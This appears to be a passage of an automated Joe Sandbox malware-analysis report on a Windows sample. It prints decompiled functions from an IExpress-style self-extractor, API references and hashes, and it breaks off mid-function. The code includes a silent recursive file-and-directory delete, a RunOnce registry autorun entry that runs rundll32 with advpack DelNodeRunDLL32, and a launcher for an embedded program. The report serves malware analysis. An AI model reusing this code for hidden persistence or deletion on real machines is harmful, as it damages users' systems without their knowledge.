                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15d8e1b523c57d9de81e905b18a3ca79db289d02cdf4136756da210fa9ace652
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8419932A002059ADF34FBB59D4977A73B8FB54F95F040566E941C2191EF78CE82CB61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E00A82390(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v280;
                                                                                                                                                                                                                                              				char _v284;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              				int _t36;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                              				_t21 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_t65 = __ecx;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					_pop(_t62);
                                                                                                                                                                                                                                              					_pop(_t66);
                                                                                                                                                                                                                                              					_pop(_t46);
                                                                                                                                                                                                                                              					return E00A86CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E00A81680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                              					_t58 = 0x104;
                                                                                                                                                                                                                                              					E00A816B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                              					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                              					_t63 = _t22;
                                                                                                                                                                                                                                              					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t58 = 0x104;
                                                                                                                                                                                                                                              						E00A81680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                              						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							_t58 = 0x104;
                                                                                                                                                                                                                                              							E00A816B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                              							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                              							DeleteFileA( &_v280);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                              								E00A816B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                              								_t58 = 0x104;
                                                                                                                                                                                                                                              								E00A8658A( &_v280, 0x104, 0xa81140);
                                                                                                                                                                                                                                              								E00A82390( &_v284);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                              					} while (_t36 != 0);
                                                                                                                                                                                                                                              					FindClose(_t63); // executed
                                                                                                                                                                                                                                              					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}






















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileA.KERNELBASE(?,00A88A3A,00A811F4,00A88A3A,00000000,?,?), ref: 00A823F6
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00A811F8), ref: 00A82427
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00A811FC), ref: 00A8243B
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A82495
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00A824A3
                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A824AF
                                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 00A824BE
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(00A88A3A), ref: 00A824C5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836429354-0
                                                                                                                                                                                                                                              • Opcode ID: f6a12dfd022fffc7eefd27ec4fa742050632355a1f04f5cb1b6f37257ba83436
                                                                                                                                                                                                                                              • Instruction ID: 30fed6dd5bdcd8211b8592d0e6ea43cc065241d67190a769543af2f1facda231
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6a12dfd022fffc7eefd27ec4fa742050632355a1f04f5cb1b6f37257ba83436
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11318431604640ABD320FBA4DD8DBFB73ACBBD4305F04492EB59586190EB34994EC762
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                                                                                              			E00A82BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t7;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                                                              				signed char _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				void* _t24;
                                                                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t4 = GetVersion();
                                                                                                                                                                                                                                              				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                              					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t17 = _t21;
                                                                                                                                                                                                                                              							 *0xa8a288(0, 1, 0, 0);
                                                                                                                                                                                                                                              							 *_t21();
                                                                                                                                                                                                                                              							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                              							if(_t24 != _t24) {
                                                                                                                                                                                                                                              								_t17 = 4;
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t20 = _a12;
                                                                                                                                                                                                                                              				_t18 = _a4;
                                                                                                                                                                                                                                              				 *0xa89124 = 0;
                                                                                                                                                                                                                                              				if(E00A82CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                              					_t9 = E00A82F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                              					_t22 = _t9; // executed
                                                                                                                                                                                                                                              					E00A852B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                              					if(_t22 != 0) {
                                                                                                                                                                                                                                              						_t32 =  *0xa88a3a; // 0x0
                                                                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                                                                              							_t19 =  *0xa89a2c; // 0x0
                                                                                                                                                                                                                                              							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              								E00A81F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t6 =  *0xa88588; // 0x0
                                                                                                                                                                                                                                              				if(_t6 != 0) {
                                                                                                                                                                                                                                              					CloseHandle(_t6);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t7 =  *0xa89124; // 0x0
                                                                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersion.KERNEL32(?,00000002,00000000,?,00A86BB0,00A80000,00000000,00000002,0000000A), ref: 00A82C03
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A86BB0,00A80000,00000000,00000002,0000000A), ref: 00A82C18
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A82C28
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00A86BB0,00A80000,00000000,00000002,0000000A), ref: 00A82C98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                              • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                              • Opcode ID: e88369ef24c4f3dc52f947031a3d192a1d3f540f56d36a74d6efaae32a215f96
                                                                                                                                                                                                                                              • Instruction ID: 1196e7adbe6f827bc716a22c41fa3b1c347988d00169cfa5bb61a42eb3be1aac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e88369ef24c4f3dc52f947031a3d192a1d3f540f56d36a74d6efaae32a215f96
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB11C2B1200205ABD720FBF5AE88B7F37A9AB84791B480126F901D3290DA34DC138761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A86F40() {
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(E00A86EF0); // executed
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}



                                                                                                                                                                                                                                              0x00a86f45
                                                                                                                                                                                                                                              0x00a86f4d

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A86F45
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                              • Opcode ID: b5d64587928c1ad3f0067ccad9923ccda0878c67cfcb269fe3bb90f5e2d376d3
                                                                                                                                                                                                                                              • Instruction ID: 195830e488dd25a6e67ce355811cabd793e850f13dac6a34dc6d669393180086
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5d64587928c1ad3f0067ccad9923ccda0878c67cfcb269fe3bb90f5e2d376d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D090027425110057B6106BB0DD1D41575916A5D602F8159A1A111C4498DB6040415712
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00A8202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				void* _v532;
                                                                                                                                                                                                                                              				int _v536;
                                                                                                                                                                                                                                              				int _v540;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				void _t56;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t72;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				intOrPtr* _t81;
                                                                                                                                                                                                                                              				void* _t86;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t90;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                                                                              				void* _t94;
                                                                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t79 = __edx;
                                                                                                                                                                                                                                              				_t28 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                              				_t84 = 0x104;
                                                                                                                                                                                                                                              				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                              				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                              				_t66 = 0;
                                                                                                                                                                                                                                              				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					L24:
                                                                                                                                                                                                                                              					return E00A86CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(_t86);
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E00A8171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                              					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                              					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                              					if(_t41 != 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t87 = _t87 + 1;
                                                                                                                                                                                                                                              					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					break;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                              					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                              					_t79 = _t84;
                                                                                                                                                                                                                                              					E00A8658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                              					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                              					_t84 = _t46;
                                                                                                                                                                                                                                              					if(_t84 == 0) {
                                                                                                                                                                                                                                              						L10:
                                                                                                                                                                                                                                              						if(GetModuleFileNameA( *0xa89a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              							L17:
                                                                                                                                                                                                                                              							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							_pop(_t86);
                                                                                                                                                                                                                                              							goto L24;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						_t72 =  &_v268;
                                                                                                                                                                                                                                              						_t80 = _t72 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t49 =  *_t72;
                                                                                                                                                                                                                                              							_t72 = _t72 + 1;
                                                                                                                                                                                                                                              						} while (_t49 != 0);
                                                                                                                                                                                                                                              						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                              						_t81 = 0xa891e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t50 =  *_t81;
                                                                                                                                                                                                                                              							_t81 = _t81 + 1;
                                                                                                                                                                                                                                              						} while (_t50 != 0);
                                                                                                                                                                                                                                              						_t84 = _t73 + 0x50 + _t81 - 0xa891e5;
                                                                                                                                                                                                                                              						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa891e5);
                                                                                                                                                                                                                                              						if(_t90 != 0) {
                                                                                                                                                                                                                                              							 *0xa88580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                              							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                              							if(_t66 == 0) {
                                                                                                                                                                                                                                              								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                              							E00A8171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                              							_t75 = _t90;
                                                                                                                                                                                                                                              							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                              							_t79 = _t23;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t56 =  *_t75;
                                                                                                                                                                                                                                              								_t75 = _t75 + 1;
                                                                                                                                                                                                                                              							} while (_t56 != 0);
                                                                                                                                                                                                                                              							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                              							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                              							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                              							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t79 = 0x4b5;
                                                                                                                                                                                                                                              						E00A844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                              					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                              					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                              					if(_t91 == 0) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              						E00A8658A( &_v268, 0x104, 0xa81140);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              				 *0xa88530 = _t66;
                                                                                                                                                                                                                                              				goto L23;
                                                                                                                                                                                                                                              			}


                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A82050
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A8205F
                                                                                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A8208C
                                                                                                                                                                                                                                                • Part of subcall function 00A8171E: _vsnprintf.MSVCRT ref: 00A81750
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A820C9
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A820EA
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00A82103
                                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A82122
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A82134
                                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A82144
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00A8215B
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A8218C
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A821C1
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A821E4
                                                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A8223D
                                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A82249
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A82250
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph (nodes marked as Executed or Not Executed)
                                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                                              			E00A855A0(void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v265;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				int _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t35;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				int _t40;
                                                                                                                                                                                                                                              				int _t44;
                                                                                                                                                                                                                                              				long _t48;
                                                                                                                                                                                                                                              				int _t49;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				int _t54;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				char _t60;
                                                                                                                                                                                                                                              				int _t65;
                                                                                                                                                                                                                                              				char _t66;
                                                                                                                                                                                                                                              				int _t67;
                                                                                                                                                                                                                                              				int _t68;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				int _t70;
                                                                                                                                                                                                                                              				int _t71;
                                                                                                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                              				int _t73;
                                                                                                                                                                                                                                              				CHAR* _t82;
                                                                                                                                                                                                                                              				CHAR* _t88;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                              				_t2 = E00A8468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                              				if(_t109 != 0) {
                                                                                                                                                                                                                                              					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                              					_t32 = E00A8468F(_t82, _t109, 1);
                                                                                                                                                                                                                                              					__eflags = _t32;
                                                                                                                                                                                                                                              					if(_t32 != 0) {
                                                                                                                                                                                                                                              						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                              						__eflags = _t33;
                                                                                                                                                                                                                                              						if(_t33 == 0) {
                                                                                                                                                                                                                                              							 *0xa89a30 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						LocalFree(_t109);
                                                                                                                                                                                                                                              						_t35 =  *0xa88b3e; // 0x0
                                                                                                                                                                                                                                              						__eflags = _t35;
                                                                                                                                                                                                                                              						if(_t35 == 0) {
                                                                                                                                                                                                                                              							__eflags =  *0xa88a24; // 0x0
                                                                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                                                                              								L46:
                                                                                                                                                                                                                                              								_t101 = 0x7d2;
                                                                                                                                                                                                                                              								_t36 = E00A86517(_t82, 0x7d2, 0, E00A83210, 0, 0);
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								__eflags =  *0xa89a30; // 0x0
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                                                                              								} else {
